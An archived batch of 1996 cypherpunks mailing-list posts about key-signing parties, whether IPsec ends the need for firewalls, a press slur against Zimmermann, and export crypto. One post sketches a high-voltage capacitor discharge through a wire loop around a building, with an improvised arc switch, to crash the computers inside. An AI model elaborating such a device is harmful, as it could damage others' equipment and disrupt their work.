From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 24 Jan 1996 10:35:41 +0800
To: Weld Pond <cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <2.2.32.19960124002633.008afc40@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:40 PM 1/23/96 -0500, Weld Pond wrote:
>
>>There was a key signing.  It was a bit rough as for many of us it was our
>>first key signing.  (I think Neal was the only person who had been to an
>>organized key signing.)  Still, it went fairly well.  Only a couple of
>>people brought their key fingerprints on disk instead of paper.  As of
>>today, I have only recieved signed keys back from a couple of people
>>though...  The next key signing will be done a bit differently.  (Live and
>>learn.)  There was also a suggestion for a nym signing at some point.
>
>This begs the question, "How would you conduct an efficient key signing 
>given what you have learned?" I am in the process of organizing one and 
>would like to get input as to the best way that this should take place.  
>Should people bring key fingerprints and public keys on floppy?  Would it 
>be nice to be online and grab public keys off of a key server? How would 
>you conduct a nym signing?

The things that I learned was that instructions should be sent to the
participants well in advance.  

Key fingerprints should be brought on paper becuase it is not always assured
of having a computer there to read the disk. (We had a lap top that was
refusing to read disks effectivly.  We had to use on of the Habit's
computers.)  
Distributing the keys on disk worked well.  (I also brought PGP and various
tools for those who did not have them.) With the key server there is still
an issue of verifying that the key is valid.  Best to have the key
fingerprint on paper, where it can be read to the group.

We also found that reading the first half of the fingerprint was more than
attiquite and saved a great deal of time.  (Which was later wasted on
getting keys off of disks.)

I will also be distributing batch files for those dos users who are not
familiar with how to sign keys and creating extra keyrings.

Most of the problems were procedural rather than technical.

It went well for a first run...
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 24 Jan 1996 08:24:52 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601232209.AA29864@su1.in.net>
Message-ID: <9601232236.AA07231@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Frank Willoughby writes:
 > Egads.  Let's take this off-line & stop bothering the cypherpunks 
 > folks with this discussion.  Those not interested in this thread
 > are kindly requested to hit the <delete> key now.  Thanks.  8^)

Actually I find it quite relevant, unlike many cypherpunk debates.
Please, don't stop on my account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 07:59:26 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: [local] Report on Portland Cpunks meeting
In-Reply-To: <Pine.BSD/.3.91.960123143344.3181A-100000@l0pht.com>
Message-ID: <199601232140.QAA11115@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Weld Pond writes:
> This begs the question, "How would you conduct an efficient key signing 
> given what you have learned?" I am in the process of organizing one and 
> would like to get input as to the best way that this should take place.  

The IETF key signing parties are the largest in existance -- about 100
people exchange signatures.

The way you handle it is this:

Every person's key is pre-submitted to key signing party organizer,
who prints a list of names and fingerprints on paper and xeroxes
enough for everyone attending.

Each person gets a sheet. Either each person in the room reads their
fingerprint in turn from their own copy, with each person in the room
checking the read fingerprint against the fingerprint on the handout,
or an appointed reader (or set of readers at the last IETF) read the
fingerprints in turn and ask the owner of the key to then simply say
"yes" or "its mine" or whatever to verify that the fingerprint matches
their own copy of the print.

Afterwards, each person will have a sheet with checkmarks next to
every fingerprint they think really belongs to a particular person's
key. They then go off later on, download the keyring for the party
from sonewhere, and sign everything they want to sign and mail back
the signed keys to the party organizer.

This is about the only way to handle things -- it turns the N squared
problem into an O(N) problem, which is still very bad if there are
more than about twenty people around.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Wed, 24 Jan 1996 07:45:37 +0800
To: perry@piermont.com
Subject: Re: IPSEC == end of firewalls
Message-ID: <9601232209.AA29864@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:01 PM 1/23/96 -0500, you wrote:


>Frank Willoughby writes:

Egads.  Let's take this off-line & stop bothering the cypherpunks 
folks with this discussion.  Those not interested in this thread
are kindly requested to hit the <delete> key now.  Thanks.  8^)


>Yes, certainly. You can bribe someone, get physical access to
>machines, etc.
>
>However, unless you know a way to crack RSA, it is unlikely that
>a system using Photuris+IPsec will permit IP spoofing.


I re-iterate, any system can be gotten around - and frequently will.
As far as IPsec goes, it is probably just a matter of time before we 
see the first CERT Advistory (maybe in a couple of years) on this.
Nothing is invincible.


>
>> The creativity of hackers is succeeded only by their motivation and
>> ability to put many hours into trying to solve a problem.  Including
>> the word "probably" was deliberate.  Kerberos was also thought to be
>> secure - 'til it was compromised.
>
>Kerberos was compromised? When? By whom? Are you talking about
>Bellovin's paper on weaknesses in Kerberos (most of which are
>avoidable or fixed in K5), or are you talking about a real break? If
>the latter, its the first that I've heard of it.

Actually, I was refering to Bellovin's paper.  Surely you don't think
that the bugs that were discovered are the only ones which can be 
exploited and that Kerberos (or any other software product) is invincible?
I don't.  


>> >> I suspect even when firewalls are embedded in the O/S,
>> >
>> >That would be somewhat meaningless. The point of a firewall, as others
>> >here have noted, is that it is easier to secure one machine than five
>> >hundred or ten thousand.
>> 

Of course it is easier to secure one machine that 500 or 10K.  However,
NOT securing the 500 or 10K systems still leaves them vulnerable to 
network attacks.  Providing the O/S with rudimentary firewalling 
capabilities helps to increase the security of those systems.  Like 
many of my colleagues in the Information Security field, I have 
(grossly) modified/hacked/butchered my systems to provide the system
with some rudimentary firewalling capabilities and the extra security
I needed.  In many cases, it meant taking advantage of strange behaviours 
of the systems to achieve the capabilities & results I wanted.



>> I disagree here also.  Systems by themselves are fairly useless.
>> Their power (and main vulnerability) comes from their ability to
>> network with other systems.  A system connected to a network is
>> vulnerable.  The fact that a corporate firewall protects the system
>> from the Internet in no way decreases the vulnerability of that
>> system (and other systems) from *internal* attacks which can be as
>> devastating as an Internet attack.
>> 
>> Including firewall capabilities as part of the Operating System's network
>> applications would help the system protect itself from abuses from the 
>> Internet - as well as from internal.
>
>These last two paragraphs are gibberish.
>

Beats me.  They make sense to me.  What part about Information & Network
Security don't you understand?  These are fairly basic concepts.  I can
go explain these concepts either in another forum or off-line via e-mail 
or phone (your dime, my time), but not here.  This is the cypherpunks 
mailing list, not the firewalls mailing list.


>You can't "firewall" every machine -- the act is meaningless. A
>Firewall is a filter designed to protect you from bugs in the setup or
>implementation of the software on the machines on the inside. What
>would it mean for a machine to have "firewall software" in the
>operating system? Systems already attempt to prevent unauthorized
>access -- the reason you have firewalls is because that software is
>sometimes buggy. "Firewall software" in the OS is a meaningless
>concept.
>

Perhaps this is where you are getting mixed up.  A firewall isn't 
just a box which you plug into a network between the company's WAN
and the Internet - it's a capability.  Many "firewalls" are systems
which implement this capability.  The main characteristics of the
firewall are (paraphrasing rather liberally from Steve Bellovin's 
book):

o The firewall is designed to protect an entity from a particular
   network connection.  Usually, we think of the entity as being
   another network.  In this particular case, we are putting in a
   firewall (or the ability to filter out what we don't to deal 
   with) on the O/S itself to reduce the risks of potential attacks
   from a network (internal LAN, Internet, etc).

o All traffic from the insecure network has to go through the firewall.
   Logical.  If the "firewall" is a piece of software which is installed
   on the O/S to "filter out" certain network connections, then we have
   "firewalled" our system.

Commercial firewall products such as: DEC's DECseal, Raptor's Eagle, 
V-ONE's SmartWall, etc, actually provide two levels of protection:  

1) They protect the internal network from hazards of the Internet 
    (or untrusted network)
2) The protect themselves from hazards of the Internet or other 
    untrusted network (such as the internal LAN)

Implementing a firewall as part of an O/S provides the protection 
mentioned in point number 2: It protects itself from the internal 
LAN to some degree.  Granted not as much as it possibly can, due 
to the fact that you have users & applications on the system which
aren't secure, however, an added measure of protection will be 
provided to the system.


>Perry


Perry, (and others who may be interested in this thread) 

This is my last mail on this thread in this list.  If you or others 
would like to discuss this further, please feel free to send me an 
e-mail directly or join me in discussing this in the firewalls mailing 
list.


Fellow cypherpunks,
I'm sorry about the bandwidth used in responding to Perry's question.
Unfortunately, it was addressed to the list and required a response
from me.  Thanks for your patience.

Back to the subject at hand (cryptography)


Best Regards,


Frank
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified/

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 24 Jan 1996 07:44:14 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <199601230635.WAA22844@netcom19.netcom.com>
Message-ID: <Pine.SV4.3.91.960123165951.9174A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The reporter's slander against Zimmerman was not accidental, or the 
result of ignorance.  Calling someone a Naxi sympathizer is not something 
that one should do without a smoking gun.

This act of aggression against cypherpunks, attempts to box us into a 
corner. Our enemies want to keep us on the defensive.  In that context, 
any and all energy we spend on "educating" and "correcting" is 
self-defeating. The hoplophobe lobby has shown, that enemies of freedom 
will not permit themselves to be "corrected". They will merely escalate 
the rate and size of their lies. Before slanders about "cop-killer 
bullets" could be corrected, they had moved onto "assault weapons".

We need to find a way to take back the initiative. We need to find a way 
to put the fear of God into liers. Violence won't work, since they are 
capable of human-wave attacks. 

I honestly don't know what reporters and editors fear the most. But, even a 
snake can be trained, if you can pinpoint the proper negative feedback.

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 24 Jan 1996 07:53:52 +0800
To: cypherpunks@toad.com
Subject: DC-Nets and Noise
Message-ID: <199601232218.RAA01328@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Tue Jan 23 17:18:12 1996

In article <ad21e7f60202100476b7@[205.199.118.202]> tcmay@got.net (Timothy C. May) writes:

>  Date: Wed, 17 Jan 1996 01:38:47 -0800
>  From: tcmay@got.net (Timothy C. May)
>  Newsgroups: omi.mail.cypherpunks
>    
>  (In any case, even for those who disagree, modern filtering techniques make
>  it trivial for the "gurus" to filter out all messages except by the several
>  of themselves, so I've never understood the point about how the list must
>  purge itself of "noise.")

To support Tim's thesis, I'll point out that I use the following lisp
configuration directives (among others) along with a news-highlighting
package that I hacked up (gnus-live.el) in order to make reading this
list (bridged to a newsgroup at my site) a much nicer experience.

When I enter the newsgroup, the authors and topics that I like are
highlighted.  I read this 5% of the list in about 15 min, skim another
5%, and then delete the other 90%.

- From my perspective cypherpunks seems to be pretty * HIGH * bandwidth!

 ------------------------------ snip! ------------------------------

	(gnus-live "Subject" "GAK Hacks and Position Surveillance")
	(gnus-live "Subject" "Libertarian Party and Crypto Anarchy")
	(gnus-live "Subject" "List of reliable remailers")
	(gnus-live "Subject" "^[A-Z][A-Z][A-Z]_[a-z][a-z][a-z] *$")	; jya's <FOO>-paper articles 

	(gnus-live "From" "Steven Levy <steven@echonyc\\.com>")
	(gnus-live "From" "Bruce Schneier <schneier@winternet\\.com>")
	(gnus-live "From" "payne@openmarket\\.com")
	(gnus-live "From" "tjic@.*openmarket\\.com")
	(gnus-live "From" "[a-z\.]+@.*openmarket\\.com")
	(gnus-live "From" "tcmay@[mail\.]?got\\.net")
	(gnus-live "From" "bsg@basistech\\.com (Bernard S\\. Greenberg)")
	(gnus-live "From" "rah@shipwright\\.com (Robert Hettinga)")
 ------------------------------ snip! ------------------------------

- -- 
TJIC (Travis J.I. Corcoran)  http://www.openmarket.com/personal/tjic/index.html

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
       PGP encrypted mail preferred.   Ask me about mail-secure.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed by mail-secure.el 1.006 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMQVepoJYfGX+MQb5AQGC+AP/ZgiOzJKNuz3ifGCsS4VHEqbA74D1NuT3
auOTUPi7qIUuGLy4GlNGTdv+tPileNuk66FCzAQ8jU+WjVjcUrqFHLoiGCEAAPeX
kOJYIf0McaMNO0osz4pJU3//BzHz9HAP2YF8kCfytA+nfPihOtMaCfSpal66ALfl
o9kWE4ue1+Q=
=fRtA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jan 1996 12:26:54 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: The Collapse of Ideas in a Pop Culture
Message-ID: <m0tetsf-0008xnC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM 1/23/96 -0800, Simon Spero wrote:
>On Tue, 23 Jan 1996, Scott Staedeli wrote:
>
>> 
>>    I _am_ a GEnXer, and I worshipped Jules Bergmann as a child. Some
>> of my first memories is pressing my nose up to the tv, watching Saturn
>> V's lifting off. If I ever win the lottery, I'm going to take the Saturn
that's 
>
>Bollocks. If you can remember Saturn Vs taking off before reruns, you're 
>too old! 
>
>Simon (27th July 1969, nearly called Neil)


In 1975, I lived in a small suburb of Kansas City, and went with my 
grandfather from Kansas City Airport on a chartered Boeing 747 to see the 
Apollo part of the Apollo/Soyuz rocket "blast off". (the whole thing was 
arranged my a local group of bigwigs, I think.)  ( I think it was a Saturn
V, but correct me if 
I'm wrong.  I was young and impressionable.) First and last large rocket I 
saw go in person; I was sincerely impressed; it was extremely LOUD and we 
were kept MILES away on a grandstand.  (But we were the closest you could 
get, as I understand it, as we were invited guests of the whole thing.)

Incidentally, flying on the same airplane from Kansas City were:

1.  Susan Ford, daughter of President Gerald Ford.
2.  Dr. Werner Von Braun.


ob crypto:  Uh, none, sorry.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 08:44:20 +0800
To: Frank Willoughby <frankw@in.net>
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601232209.AA29864@su1.in.net>
Message-ID: <199601232221.RAA11184@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I won't address the rest of the commentary, but I ought to answer this.

Frank Willoughby writes:
> >> the word "probably" was deliberate.  Kerberos was also thought to be
> >> secure - 'til it was compromised.
> >
> >Kerberos was compromised? When? By whom? Are you talking about
> >Bellovin's paper on weaknesses in Kerberos (most of which are
> >avoidable or fixed in K5), or are you talking about a real break? If
> >the latter, its the first that I've heard of it.
> 
> Actually, I was refering to Bellovin's paper.

Bellovin's paper doesn't list real breaks in Kerberos. It notes
problems, which are real but not fatal and have been largely fixed.

> Surely you don't think
> that the bugs that were discovered are the only ones which can be 
> exploited and that Kerberos (or any other software product) is invincible?
> I don't.  

Look, you clearly made a big claim -- that Kerberos had been
compromised. If you can't back such comments up, don't make such
claims.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 24 Jan 1996 11:36:54 +0800
To: frankw@in.net>
Subject: Re: IPSEC == end of firewalls
Message-ID: <199601240125.RAA07818@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At least maybe I can avoid Perry's wrath for an off topic post :-).

At 15:01 1/23/96 -0500, Perry E. Metzger wrote:
>You can't "firewall" every machine -- the act is meaningless. A
>Firewall is a filter designed to protect you from bugs in the setup or
>implementation of the software on the machines on the inside. What
>would it mean for a machine to have "firewall software" in the
>operating system? Systems already attempt to prevent unauthorized
>access -- the reason you have firewalls is because that software is
>sometimes buggy. "Firewall software" in the OS is a meaningless
>concept.
>
>Perry

I agree that firewalling every machine would be extreemly difficult with
Unix based systems (including MSDOS and MacOS) because so many usefull
hacker tools are available from root and everyone has access to root.  With
systems that provide better isolation, it becomes possible to dedicate the
network interface to the protection domain which is running the firewall
code.  You also need to divide up the administration so the direct user
does not break that isolation.

BTW, IBM's VM/370 (and successors) has good isolation and could probably
perform in this role.  Other systems such as KeyKOS
(http://www.webcom.com/~agorics/) and EROS (http://www.cis.upenn.edu/~eros)
certainly could.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jan 1996 08:22:59 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <Pine.SV4.3.91.960123165951.9174A-100000@larry.infi.net>
Message-ID: <199601232226.RAA11199@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Horowitz writes:
> The reporter's slander against Zimmerman was not accidental, or the 
> result of ignorance.
[...]
> This act of aggression against cypherpunks, attempts to box us into a 
> corner.

Okay. I think I understand. You're a fruitcake. Easy enough.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Wed, 24 Jan 1996 08:27:33 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <v01520c07ad2ab1874596@[199.227.1.139]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:06 AM 1/23/96, Herb wrote:
>Careful... what would YOU have done, with your customers demanding stronger
>crypto today and you unable to legally give it to them?

Umm - contract the crypto overseas somewhere it would be legal to export it
from?  Then import the code to the USA, with a press release to WSJ & NYT
stating that American programmers were being put out of work by ITAR.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)

2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 24 Jan 1996 10:27:08 +0800
To: cypherpunks@toad.com
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <Pine.SV4.3.91.960123165951.9174A-100000@larry.infi.net>
Message-ID: <199601240015.SAA03590@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> We need to find a way to take back the initiative. We need to find a way 
> to put the fear of God into liers.

I'm outta step here, I know, but it seems to me that if we're going to go
around advocating anonymity and technology that makes censorship
impossible we'd better grow thicker skins. 

Phil changed the world.  Maybe not as much as people like Roosevelt or
Reagan, but a lot more than most people do.  He wrote a software package
that's in wide use, and which has lots of admirers.  He used technology to
effect positive political changes around the world -- noteworthy both for
the effect and the ingenuity of the strategy.  And he stood up under a
personal attack from the government.  They came at him, but he took it and
won. 

Everyone who does something extraordinary gets hit with pot shots.  It's 
part of the package.

Is it a terrible thing that someone called him a name in print?  Yes.  If 
he's got a case, he should sue.  But something tells me he's tough enough 
to take it either way.

> Violence won't work, since they are capable of human-wave attacks.

And because it's wrong?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jan 1996 13:21:24 +0800
To: Rick Smith <smith@sctc.com>
Subject: Re: NSA vacuuming down Internet traffic
Message-ID: <m0teuld-00092kC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 PM 1/23/96 -0600, Rick Smith wrote:
>>>...listening for Kissinger..
>
>> Don't tell me, let me guess:  20 years ago, if you had told anyone about
>> this project, you would have had to kill them.  Now, 20 years later, after a
>> few levels of re-classifications and de-classifications, all you have to do
>> is to sneer in our general direction.  <G>
>
>Not. It wasn't a classified project. It was upstairs from Woolworth's
>in Central Square, ferheavens sake. SCIFs would have annoyed the
>landlord, and presented interesting "challenges" given the pasteboard
>construction. We didn't even have any of those clunky file cabinets
>for Keeping Secrets Safe.  We just amused ourselves with such
>speculation, since this was clearly a technology that excited interest
>in certain quarters.
>Rick.

I heard vague rumors of such capabilities about 20 years ago.  At the time,
I had no reason to make overseas telephone calls, but if I did I would have
interspersed the friendly conversation with terms like
"Plutonium...Khadafi...Khomeini...football...uranium..."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jan 1996 13:34:26 +0800
To: cypherpunks@toad.com
Subject: Re: [noise!] (fwd) Re: FYA/I: Who'd have gaussed it?
Message-ID: <m0tev8Y-0008z1C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:55 PM 1/23/96 -0500, Robert Hettinga wrote:
>Just in case you wanted to know how dept...
>
>Cheers,
>Bob
>
>--- begin forwarded text
>
>Date: Tue, 23 Jan 1996 11:21:54 -0500 (EST)
>From: Paul Picot <ppicot@irus.rri.uwo.ca>
>To: Philip Stein <pstein@measurement.com>
[stuff deleted for space]

>Use a coil *around* the building.  This makes the problem just
>within the realm of the possible, though horribly impractical.
>
>I'll spare the collected minds and spool spaces of the technomads list the
>details, and reduce this to a recipe:
>
>Collect the following:
>
>- 20 miles of 0000-guage insulated copper wire (about 32 tons worth)
>- five standard 20 MW gas-turbine power plant generators (about 20 tons ea.)
>- fuel for about 10 minutes of operation (about 4 tons)
>- five standard high voltage transmission rectifier modules for the above.
>- one standard 69,000 volt, 10,000 amp transmission-line contactor set
>
>Wrap 1000 turns of the wire around your target.  This makes a bundle about
>18 inches in diameter.  Wire your generators and rectifiers to yield
>70,000 volts DC, and connect them via the contactor to the coil.


Suppose, however, the goal was NOT to erase the media, but simply to reset 
(temporarily crash) the computers inside.  Please recalculate based on:

1.  A 72,000 volt, 0.8 microfarad capacitor, fully charged.
2.  One turn of, say, #16 wire around the building.
3.  A (sacrificial) improvised switch constructed by forcing a sharpened 
point through a thin, insulating layer of polyethylene plastic sheet against 
a conductive plate, which 
eventually (and catastrophically) arcs through the remaining fraction of a 
millimeter to produce an exceedingly low-impedance contact in a microsecond 
or so.





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQWb3/qHVDBboB2dAQF0YgP+M8pc9nYzp0fwBblcd6TNC3kDt88NZbpy
WiyeCxfW8tx8KNgniERKMIRrCFXfciUew9Bs1orX3CdJeDgUG2ByiLoSbGcco3Jm
Vtw4MIVhhyITOhF2ocZBsReutm5WonnZlj+0upxgzYOwC0NyXR5jtHmsUMksa9Sq
jy0mW2rdLxw=
=1GMF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Wed, 24 Jan 1996 13:01:39 +0800
To: abarrett@ee.net
Subject: Re: IMC Resolving Email Security Complexity Workshop
Message-ID: <v03004a0ead2b4cfbdb17@[205.214.160.74]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:24 PM 1/23/96, abarrett@ee.net wrote:
>Found this in the box the other day - thought it might be of interest, esp
>regarding secure email standards.

	thanks for forwarding.  thought I hit all the relevant lists but it
looks like I didn't even come close.  How COULD I have missed the
illustrious cypherpunks list.  tsk. tsk.

d/

--------------------
Dave Crocker              Brandenburg Consulting            +1 408 246 8253
675 Spruce Dr.            dcrocker@brandenburg.com      (f) +1 408 249 6205
Sunnyvale CA 94086 USA    http://www.brandenburg.com    (p) +1 408 581 1174






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@minerva.cis.yale.edu>
Date: Wed, 24 Jan 1996 10:04:16 +0800
To: cypherpunks@toad.com
Subject: Re: IPSEC == end of firewalls
In-Reply-To: <9601232016.AA22238@su1.in.net>
Message-ID: <Pine.SOL.3.91.960123184450.22387D-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


Because this has Cpunks relevance in the use of crypto, I'm going to keep 
it on this list...

> remain relatively secure.  However, I am I'm not saying that adding
> firewalling capabilities would make the system invincible.  I *am* 
> saying that it would provide the system with more security than it 
> currently has and would help to reduce (not eliminate) some risks 
> associated with networking.  

But what does it mean to add 'firewalling capabilities' to an O/S?  By 
definition, a firewall is supposed to stop the spread of 'fire' by being 
the sole mechanism for the interchange of packets.

If you're referring to making a hardened OS that can protect itself 
through the use of well written code, memory protections, etc. then, yes 
by all means add it to your OS, but these shouldn't be luxuries in that 
they're thought of as 'firewalling' features.  Rather these things should 
be compulsory in the development of OS's.

> Of course, it would be terrific if the vendors would produce Operating 
> Systems which are secure AND usable.  (I think the market will eventually 
> demand this from vendors, but this probably won't happen in the next year 
> or two.)

Even if OS's could be secure(lets not get into Orange Book here) they 
would need constant updating.  Most users have problems printing, let 
alone installing patches and tweaking afterwards to deal with conflicts.  
And you can't expect IS to micromanage the corporation's entire fleet of 
machines.

This would be nice, and would be a good start, but like I said above, 
these things shouldn't be considered to be luxuries.  Rather they should 
be compulsory.  That doesn't mean that they will obsolete firewalls by 
any stretch of the imagination.

Ben.

(I'm starting to think Frank may have been right to move this to 
firewalls.  I think I'll crosspost this message too)
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed        Finger samman@suned.cs.yale.edu for key
Want to hire a soon-to-be college grad? 		Mail me for resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Wed, 24 Jan 1996 10:12:04 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: IPSEC == end of firewalls
Message-ID: <9601240007.AA06686@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:40 PM 1/23/96 -0800, Simon Spero allegedly wrote:

>This thread definitely belongs as cypherpunks, as the whole point of the 
>discussion is to debate the limits of what cryptography on its own can 
>achieve. 
>

Back, by popular demand...

I didn't really want to continue this discussion here, but I received 
a couple mails requesting that I continue in this thread.  I'm still 
uncomfortable with this, but I'll oblige.


>What do you need as well as crypto before you can remove all firewalls?

I don't think this will ever happen.  However, as long as we're dreaming, 
here's my 2 cents worth on a good start for a secure environment would 
look like.  It's not complete by any stretch of an imagination, but it's 
a start:


o Start with a Secure Operating System - Secure Computing's firewall is a good 
   example of this.  They have done some pretty neat things with Type
Enforcement.

o Add in some decent authentication/encryption/verification mechanisms/digital 
   sigs, etc V-ONE's SmartGate, Fortezza, & Persona would do nicely.  Hand-held 
   token devices such as the ones mentioned above should work well.  Of course,
   the user interface to these should be user-friendly.

o Throw in a secure method of communication PGP, PGPphone, etc - which is
   *user-friendly* and which helps automate & manage the key-distribution 
   process (securely, of course)

o Mix in applications which have been re-written to be secure, fast, intuitive,
   user-friendly & interact well with encryption (various kinds).

o Add in a central clearinghouse (don't care where) where the latest key 
   expirations/compromises can be checked automatically to confirm that 
   the e-mail you just received is still valid also wouldn't hurt.

o Combine the best capabilities of Checkpoint's (firewall) lower-level 
   filtering capabilities with V-0NE's upper-level filtering capabilities
   and add these to the secure Operating System's network defense mechanisms

o Add a good dose of IPsec (sprinkling lightly) to secure the pipe
   (kindly omitting the Watergate plumbers)

o Add user-friendly single sign-on capability (Kerberos, et al)

o Mix in heavy encryption with (ridiculously long) keys   (say the number of 
   grains of sand stretched end-to-end to make a light year).  8^)

o Make all of the above user-friendly & easy-to-implement on a large scale  8^)

Throw the ingredients into a pot & stir briskly.


Like I said earlier, it's just a start & not a whole solution by any 
stretch of the imagination.  It's probably a nice wish list, though.  
It'd sure be nice if it came true.  (If you think the above list is 
optimistic, you ought to see my Christmas Wish List).  8^)  8^)  8^)



>
>Simon
>
>(defun modexpt (x y n)  "computes (x^y) mod n"
>  (cond ((= y 0) 1) 	((= y 1) (mod x n))
>	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
>	(t (mod (* x (modexpt x (1- y) n)) n))))

Best Regards,


Frank
Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800   - http://www.fortified.com/fortified/

<standard disclaimer>
The opinions expressed above are of the author and may not 
necessarily be representative of Fortified Networks Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jan 1996 13:42:47 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <m0tevcz-00090ZC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:26 PM 1/23/96 -0800, Alan Olsen wrote:

>>This begs the question, "How would you conduct an efficient key signing 
>>given what you have learned?" I am in the process of organizing one and 
>>would like to get input as to the best way that this should take place.  
>>Should people bring key fingerprints and public keys on floppy?  Would it 
>>be nice to be online and grab public keys off of a key server? How would 
>>you conduct a nym signing?
>
>The things that I learned was that instructions should be sent to the
>participants well in advance.  
>
